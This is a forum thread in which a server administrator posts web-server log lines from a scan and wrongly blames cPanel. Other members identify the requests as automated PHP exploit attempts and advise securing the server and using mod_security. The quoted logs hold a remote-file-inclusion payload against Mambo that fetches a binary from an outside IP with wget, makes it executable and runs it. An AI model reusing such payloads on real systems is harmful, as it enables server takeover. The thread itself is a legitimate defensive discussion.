laverdir

Registered
Feb 26, 2006
3
0
151
i know that you cpanel guys are searching for illegal users, but 'brute force' scanning of every ip address isn't the way. an appology will be fine!

69.93.35.178 - - [26/Feb/2006:08:02:38 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 298
69.93.35.178 - - [26/Feb/2006:08:02:39 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 200 586
69.93.35.178 - - [26/Feb/2006:08:02:40 -0600] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 304
69.93.35.178 - - [26/Feb/2006:08:02:41 -0600] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 302
69.93.35.178 - - [26/Feb/2006:08:02:42 -0600] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 313
69.93.35.178 - - [26/Feb/2006:08:02:44 -0600] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 308
69.93.35.178 - - [26/Feb/2006:08:02:46 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
69.93.35.178 - - [26/Feb/2006:08:02:47 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 303
69.93.35.178 - - [26/Feb/2006:08:02:48 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 310
69.93.35.178 - - [26/Feb/2006:08:02:50 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 311
69.93.35.178 - - [26/Feb/2006:08:02:51 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 305
69.93.35.178 - - [26/Feb/2006:08:02:52 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 311
69.93.35.178 - - [26/Feb/2006:08:02:53 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 308
69.93.35.178 - - [26/Feb/2006:08:02:55 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
69.93.35.178 - - [26/Feb/2006:08:02:56 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 305
69.93.35.178 - - [26/Feb/2006:08:02:57 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 305
 

rustelekom

Well-Known Member
PartnerNOC
Nov 13, 2003
290
0
166
moscow
it is the virus. virus scan your servers for voulnarabilities.
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,217
4
193
Minneapolis, MN
laverdir said:
i know that you cpanel guys are searching for illegal users, but 'brute force' scanning of every ip address isn't the way. an appology will be fine!

69.93.35.178 - - [26/Feb/2006:08:02:38 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 298
The most important thing is securing your server.
 
Last edited:

laverdir

Registered
Feb 26, 2006
3
0
151
i don't think that is related, i have entered ip address in my browser.

but it could be related to the famous 'dns poisoning'..
 

dave9000

Well-Known Member
Apr 7, 2003
888
1
168
arkansas
cPanel Access Level
Root Administrator
It;s attempts to exploit various php scripts. If that is the only ip you have been hit from consider yourself lucky. We get hit average of 5-10 times a hr with basically the same thing.

You need to secure your server like andy said. If your running apache then mod_security would be a good addition.

These exploit attempts did not come from www.cpanel.net.